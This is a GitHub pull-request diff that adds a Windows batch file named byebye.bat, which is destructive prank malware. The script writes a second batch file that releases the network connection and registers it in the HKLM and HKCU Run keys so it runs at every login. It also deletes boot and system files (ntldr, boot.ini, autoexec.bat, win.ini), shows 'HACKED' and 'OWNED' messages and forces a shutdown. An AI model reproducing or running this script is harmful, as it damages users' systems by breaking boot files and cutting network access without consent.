Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
20 changes: 20 additions & 0 deletions byebye.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
@echo off

set "batPath=C:\Windows\wimn32.bat"

(
echo @echo off
echo break off
echo ipconfig /release
echo end
) > "%batPath%"

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WINDOWsAPI" /t REG_SZ /d "%batPath%" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "CONTROLexit" /t REG_SZ /d "%batPath%" /f

echo You Have Been HACKED!
pause

del /q "C:\autoexec.bat" "C:\boot.ini" "C:\ntldr" "C:\Windows\win.ini"
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER C: Drive"